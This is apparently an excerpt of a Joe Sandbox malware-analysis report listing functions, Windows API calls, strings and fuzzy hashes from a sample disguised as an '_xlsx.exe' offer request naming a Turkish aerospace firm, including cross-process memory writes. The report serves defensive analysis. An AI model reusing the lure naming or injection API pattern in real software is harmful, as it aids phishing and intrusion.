HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001E0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001E1002

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e1579f8bab344b9a401c682ebf713e0faa1bdb9998bac16bea3ef191e7252c7
Instruction ID: 4a2576844eabb531e2c6a1b26a5daf58abec0b0c83e4dc9b8463e5e2c74b090e
Opcode Fuzzy Hash: 4e1579f8bab344b9a401c682ebf713e0faa1bdb9998bac16bea3ef191e7252c7
Instruction Fuzzy Hash: 6AF04F39180751BBD7215FA5AC4DF9A3B6EEF99761F218414F949C6291CE70DC408A60

Function 001E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001E102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001E1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001E104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1062

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c38cfb53f4073e6def0ed566f086f0d157c406a9d8caba36faa1648191df777f
Instruction ID: 4bb9e937b69e0f2ea17e031917875c533cde37d5cbb3baa82e0067e99756f34a
Opcode Fuzzy Hash: c38cfb53f4073e6def0ed566f086f0d157c406a9d8caba36faa1648191df777f
Instruction Fuzzy Hash: DCF04939280751BBDB215FA5EC4DF9A3BAEEF99761F214824FA49C6250CE70D8408A60

Function 001F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0324
CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0331
CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F033E
CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F034B
CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0358
CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0365

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6450e2b2ddb89ac96bf1938d4fa86c9cf3e9953b175e2a937b8306bf307c5960
Instruction ID: 9606c89dfbc2be1baf84530137517f319dd9b9602f3ae688632605d3fac2c5ef
Opcode Fuzzy Hash: 6450e2b2ddb89ac96bf1938d4fa86c9cf3e9953b175e2a937b8306bf307c5960
Instruction Fuzzy Hash: 2D01A276800B199FC731AF66D880822F7F5BF643153158A3FD29652932C771A954CF80

Function 001BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001BD752

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001BD764
_free.LIBCMT ref: 001BD776
_free.LIBCMT ref: 001BD788
_free.LIBCMT ref: 001BD79A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2f251cd16138562842b6a093a169d913e95df1321bb82d0b95b609d154e5a5ad
Instruction ID: dd49ca0b59fc92b5dc53de1f08f37028b655c1baa5d7f898dada154cc1ed8e21
Opcode Fuzzy Hash: 2f251cd16138562842b6a093a169d913e95df1321bb82d0b95b609d154e5a5ad
Instruction Fuzzy Hash: 6EF09032501218BB8669EB68F9CACDA7BDDBB05318BA40C05F04DE7502DF30FC808A64

Function 001E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 001E5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 001E5C6F
MessageBeep.USER32(00000000), ref: 001E5C87
KillTimer.USER32(?,0000040A), ref: 001E5CA3
EndDialog.USER32(?,00000001), ref: 001E5CBD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5125660cfd82f61aa1a2c783ff2dad5b4df288f85c6d1b19bdf965b3be8720bf
Instruction ID: 33bcdbad6d072956c61e5f634b848ee73a7d10d34e2ae81c587bce837f73795c
Opcode Fuzzy Hash: 5125660cfd82f61aa1a2c783ff2dad5b4df288f85c6d1b19bdf965b3be8720bf
Instruction Fuzzy Hash: 7C01D634540B44ABEB245B11ED5EFEA77BDBF54B09F100159B183A20E1DBF0A984CB90

Function 001B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001B22BE

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001B22D0
_free.LIBCMT ref: 001B22E3
_free.LIBCMT ref: 001B22F4
_free.LIBCMT ref: 001B2305

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b4bab28f38015beee61b84747b69e743b16cd341f8297bdedeeb9785957c9568
Instruction ID: 9ac88229c8750f3832a675a35b392da3b1df4fb4a49d6b7461c851f2ccc9f38a
Opcode Fuzzy Hash: b4bab28f38015beee61b84747b69e743b16cd341f8297bdedeeb9785957c9568
Instruction Fuzzy Hash: D2F054B44013309B8653AF58BC499983B64F729752B110A06F818D3671CB3004259FE9

Function 001995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001995D4
StrokeAndFillPath.GDI32(?,?,001D71F7,00000000,?,?,?), ref: 001995F0
SelectObject.GDI32(?,00000000), ref: 00199603
DeleteObject.GDI32 ref: 00199616
StrokePath.GDI32(?), ref: 00199631

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 5bd9a94226a121e6ce1d137d5ebcfc73071f49329c1e7c22f04f3cd27a24f3f8
Instruction ID: 52c795031acf647a84857515581bd19fcc619d98f537ceab2a1f0a8ad73b4e69
Opcode Fuzzy Hash: 5bd9a94226a121e6ce1d137d5ebcfc73071f49329c1e7c22f04f3cd27a24f3f8
Instruction Fuzzy Hash: EDF04934046348EBDB265F69FD1CBA93F61BB25323F248258F469950F0CB3189A5DF68

Function 001B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001B10F9
__freea.LIBCMT ref: 001B1117

Part of subcall function 001B1537: _free.LIBCMT ref: 001B154F

Strings

am/pm, xrefs: 001B117A
a/p, xrefs: 001B11DE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 4e7a7d9b47d133fa887008bc63ada8a89b1d96579aafd9f174876520e53413ea
Instruction ID: edd2c25c23eb94ca5ad3fb8d0e4c56ca92f8c6a12bc86089d5853535e2da62bd
Opcode Fuzzy Hash: 4e7a7d9b47d133fa887008bc63ada8a89b1d96579aafd9f174876520e53413ea
Instruction Fuzzy Hash: 19D10731900206FADB289F68C865BFEB7F1FF16310FAB4159E9019B660E3759D80CB91

Function 002061D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 001A0242: EnterCriticalSection.KERNEL32(0025070C,00251884,?,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A024D
Part of subcall function 001A0242: LeaveCriticalSection.KERNEL32(0025070C,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A028A

Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9

__Init_thread_footer.LIBCMT ref: 00206238

Part of subcall function 001A01F8: EnterCriticalSection.KERNEL32(0025070C,?,?,00198747,00252514), ref: 001A0202
Part of subcall function 001A01F8: LeaveCriticalSection.KERNEL32(0025070C,?,00198747,00252514), ref: 001A0235

Part of subcall function 001F359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001F35E4
Part of subcall function 001F359C: LoadStringW.USER32(00252390,?,00000FFF,?), ref: 001F360A

Strings

x#%, xrefs: 0020633A
x#%, xrefs: 00206353
x#%, xrefs: 0020636F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#%$x#%$x#%
API String ID: 1072379062-3923245774
Opcode ID: 17d35f82cf469bcd6d198c001b085cf9dce0b73b255d461805a7c0ed89345b05
Instruction ID: a88373a132eb9bfe571ed6237fbc27d1bb4d14b60f88969bb3c7641a1af698c2
Opcode Fuzzy Hash: 17d35f82cf469bcd6d198c001b085cf9dce0b73b255d461805a7c0ed89345b05
Instruction Fuzzy Hash: 11C1B271A10206AFDB14DF58C894EBEB7B9FF59300F548069F9059B292DB70EE64CB90

Function 00207B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 001A0242: EnterCriticalSection.KERNEL32(0025070C,00251884,?,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A024D
Part of subcall function 001A0242: LeaveCriticalSection.KERNEL32(0025070C,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A028A

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9

__Init_thread_footer.LIBCMT ref: 00207BFB

Part of subcall function 001A01F8: EnterCriticalSection.KERNEL32(0025070C,?,?,00198747,00252514), ref: 001A0202
Part of subcall function 001A01F8: LeaveCriticalSection.KERNEL32(0025070C,?,00198747,00252514), ref: 001A0235

Strings

G, xrefs: 00207C7F
5, xrefs: 00207C78
Variable must be of type 'Object'., xrefs: 00207C3A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 1b3852b9ee15b72dfe9dc75953dd2281fc745d05abfd81e47600abca1db65240
Instruction ID: 018d3e56c1e68ea581b5406131c00f591d09354264b5a2e75495357e31ca0816
Opcode Fuzzy Hash: 1b3852b9ee15b72dfe9dc75953dd2281fc745d05abfd81e47600abca1db65240
Instruction Fuzzy Hash: CA919C74A24309EFDB04EF54D8909BEB7B1FF59300F50805AF806AB292DB71AE65CB50

Function 001E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001E21D0,?,?,00000034,00000800,?,00000034), ref: 001EB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001E2760

Part of subcall function 001EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001EB3F8

Part of subcall function 001EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001EB355
Part of subcall function 001EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001E2194,00000034,?,?,00001004,00000000,00000000), ref: 001EB365
Part of subcall function 001EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001E2194,00000034,?,?,00001004,00000000,00000000), ref: 001EB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001E27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001E281A

Strings

@, xrefs: 001E2832

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 73a54e685f8bbe2abdc72e012e5484f4759d94548039ab77924ca2a5e9b27da9
Instruction ID: 4d4ac3d6e05ce07b0122a71a88068aa30f0721945bbe482c4f5832b799ce480f
Opcode Fuzzy Hash: 73a54e685f8bbe2abdc72e012e5484f4759d94548039ab77924ca2a5e9b27da9
Instruction Fuzzy Hash: 92416C72900218AFDB14DFA5CD86EEEBBB8AF19300F104055FA45B7180DB706E45CBA1

Function 001B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe,00000104), ref: 001B1769
_free.LIBCMT ref: 001B1834
_free.LIBCMT ref: 001B183E

Strings

C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xrefs: 001B1760, 001B1767, 001B1796, 001B17CE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
API String ID: 2506810119-3151152429
Opcode ID: 4c05e5be198430cff387028c504c04264c7953edc243b33318f3ffd7aaa6e87a
Instruction ID: 0ec1a8576644a4a1073156279141890ccd95cc6e30f8d317fe0ef9f0e0d1d28a
Opcode Fuzzy Hash: 4c05e5be198430cff387028c504c04264c7953edc243b33318f3ffd7aaa6e87a
Instruction Fuzzy Hash: 02318E75A40258BBDB21DF99A885DDEBBFCEB95310F51416AF804D7211DB708E40CB90

Function 001EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001EC306
DeleteMenu.USER32(?,00000007,00000000), ref: 001EC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00251990,01715488), ref: 001EC395

Strings

0, xrefs: 001EC2DF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: d8b3ace6ab02b752911e6303bbdc4360184d8e87cc8cdf1bcfeae155e7a9fccb
Instruction ID: 72b03ef7f217c0af21f01190c71253e9d7dd86e5fe4b1d387bcb7517bf134dbe
Opcode Fuzzy Hash: d8b3ace6ab02b752911e6303bbdc4360184d8e87cc8cdf1bcfeae155e7a9fccb
Instruction Fuzzy Hash: 8F418E312047819FD724DF26DC84B5EBBA8BF95310F14861DF9A5972D1D730A905CBA2

Function 00214416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0021CC08,00000000,?,?,?,?), ref: 002144AA
GetWindowLongW.USER32 ref: 002144C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002144D7

Strings

SysTreeView32, xrefs: 0021447C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 7bab549ca31426cdb9b42ab3037fd4df32f0468ad84c75a46d0785673e48df44
Instruction ID: be6bc8a449d756288d36116ecbf1ca94f8c8b9e43c8fe5478972c2bd10d9245b
Opcode Fuzzy Hash: 7bab549ca31426cdb9b42ab3037fd4df32f0468ad84c75a46d0785673e48df44
Instruction Fuzzy Hash: CA318F71220206AFDF20AE38DC45BDA77A9EB28334F244715F979921D0D770ECA09B50

Function 0020304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0020335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00203077,?,?), ref: 00203378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
_wcslen.LIBCMT ref: 0020309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00203106

Strings

255.255.255.255, xrefs: 00203095, 0020309A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: b69a29a53c44f1f36f160c867475ec470d4f03d9f4a88be88a8cc7f8aa4083c1
Instruction ID: c0cf71c2d219f9f17fc8c6faaa51751e197d99d3fdd4319c1aa9dc7f40ed107c
Opcode Fuzzy Hash: b69a29a53c44f1f36f160c867475ec470d4f03d9f4a88be88a8cc7f8aa4083c1
